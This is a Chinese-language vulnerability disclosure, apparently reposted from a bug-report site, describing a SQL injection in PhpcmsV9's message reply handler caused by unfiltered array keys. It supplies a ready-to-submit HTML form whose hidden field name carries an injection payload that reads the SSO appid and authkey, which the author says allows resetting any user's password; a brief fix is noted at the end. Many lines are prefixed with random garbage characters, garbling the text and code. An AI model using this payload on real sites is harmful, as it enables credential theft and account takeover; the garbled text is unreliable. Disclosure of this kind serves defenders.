PhpcmsV9 SQL注射修改任意用户密码漏洞

admin

简要描述：
* k8 }. A& \  P8 O
; h  V$ X' b& i第二发如约来到，感谢大家的关注，在第二发中使用了一个无限制的SQL注射，最终目的可以修改任意用户密码，建议确认安全危害等级为高。
' P/ o; l0 D% r; U  ]) _& s
, b3 b& v8 q. L. o% \0 i' D明天再更新下一个漏洞。
7 }  h# D/ q! y) _详细说明：
3 F7 m$ m3 Y/ z( ?1 D* A# Y+ h% C+ l在/phpcms9/phpcms/modules/message/index.php中有代码如下：
3 p1 o) m/ M  W
$messageid = $this->message_db->insert($_POST['info'],true);


1 H! G! R: e% R* [. z. ^3 D: Yinsert方法是key value的，代码如下：

( t. }0 j7 {4 K) dpublic function insert($data, $table, $return_insert_id = false, $replace = false) {
( K* l/ V* U1 F" \                if(!is_array( $data ) || $table == '' || count($data) == 0) {
                        return false;
; H! w7 P- A8 w& e/ e. V* I: A' \                }
               
1 f/ u4 Z' v1 l0 H                $fielddata = array_keys($data);
' I" m% L8 F& Y, Q                $valuedata = array_values($data);
/ [0 U$ s& U0 S  T0 h  L0 {                array_walk($fielddata, array($this, 'add_special_char'));
                array_walk($valuedata, array($this, 'escape_string'));
/ |$ M4 F" i$ F8 G: {* T               
! z6 M( R; {- |                $field = implode (',', $fielddata);
                $value = implode (',', $valuedata);
+ w& }( k' `/ E8 v7 @  o1 e+ y
                $cmd = $replace ? 'REPLACE INTO' : 'INSERT INTO';
# ?4 A$ X1 ^9 E2 b0 [/ c# p# `                $sql = $cmd.' `'.$this->config['database'].'`.`'.$table.'`('.$field.') VALUES ('.$value.')';
                $return = $this->execute($sql);
1 A& Q/ O/ T1 _! `2 D4 V                return $return_insert_id ? $this->insert_id() : $return;
: u9 K4 F0 v( n. P% e! u        }
  w$ T2 w8 ~2 [, T

嗯，很遗憾的是
( S2 `, j+ q/ f: O6 {& z& V
array_walk($fielddata, array($this, 'add_special_char'));

* o" [* y5 ]6 S( p, z! X- i- i: |
6 p  u% |9 K1 y- z. h8 Y! u  D中并没有对key做任何的过滤，所以，第一段提到的代码导致了一个SQL注射漏洞 ：（。
# N, Q  V+ m- v4 e/ @& }7 ~
  n8 c% p6 M: `到此，为了poc一下，我读取了我本地的authkey，接下来我已经可以重置任意用户密码了，后面的事情我就没有演示了。

漏洞证明：
9 W: H  _- n' ~读出了phpsso_server的appid和authkey，然后可以调用client.class.php中的ps_member_edit函数修改任意用户密码。

% C% H6 ^& X7 N7 }' m8 n
; D/ ]+ M! m# J" O3 g, |/ r表单如下：用户名什么的得自己改一改。
<form name="myform" action="http://localhost/phpcms9/index.php?m=message&c=index&a=reply" method="post" id="myform">
<table width="100%" cellspacing="0" class="table_form">
& I4 ^1 s, _& T5 H<tr>
7 z, y: G+ x9 A9 W4 X<th>标 题：</th>
% o4 [4 u8 k/ L) o<td><input name="info[subject]" type="text" id="subject" size="30" value="Re: hh"  class="input-text"/></td>
</tr>
0 W# O, g! }1 S<tr>
<th>内 容：</th>
8 A0 G0 m- q6 o  M$ z9 x<td><textarea name="info[content]"  id="con" rows="5" cols="50"></textarea></td>
</tr>
<input type="hidden" name="info[replyid]" value="2" />
1 s, f, _0 y" I* _7 R<input type="hidden" name="info[send_to_id]" value="cc" />
8 U( Z! o( `- _5 ?, ^<input type="hidden" name="info[send_from_id]" value="hh">
<!-- 漏洞的利用重点在这里开始 -->
6 G) X$ B; \4 e6 \  E" }<input type="hidden" name="info[`status`) values ((Select group_concat(appid,CHAR(42),authkey) from v9_sso_applications),1,1,1,CHAR(104, 104),1)#]" value="cc" />
2 ]2 A  }! D9 @; \. r$ x- d% U<!-- 漏洞的利用重点在这里结束 -->
1 R/ N9 ?0 s) B9 f, u<tr>
<th>验证码：</th>
<td><input name="code" type="text" id="code" size="10"  class="input-text"/> <img id='code_img' onclick='this.src=this.src+"&"+Math.random()' src='http://localhost/phpcms9/api.php?op=checkcode&code_len=4&font_size=14&width=110&height=30&font_color=&background='></td>
</tr>
<tr>
<td></td>
<td colspan="2"><label>
- a5 j0 l3 C9 w<input type="submit" name="dosubmit" id="dosubmit" value="确 定" class="button"/>
</label></td>
; g) x' P0 v* c% u+ M2 f</tr>
</table>
</form>
在add_special_char函数内对key做过滤就可以了。

; w5 a0 ?# ]  N( o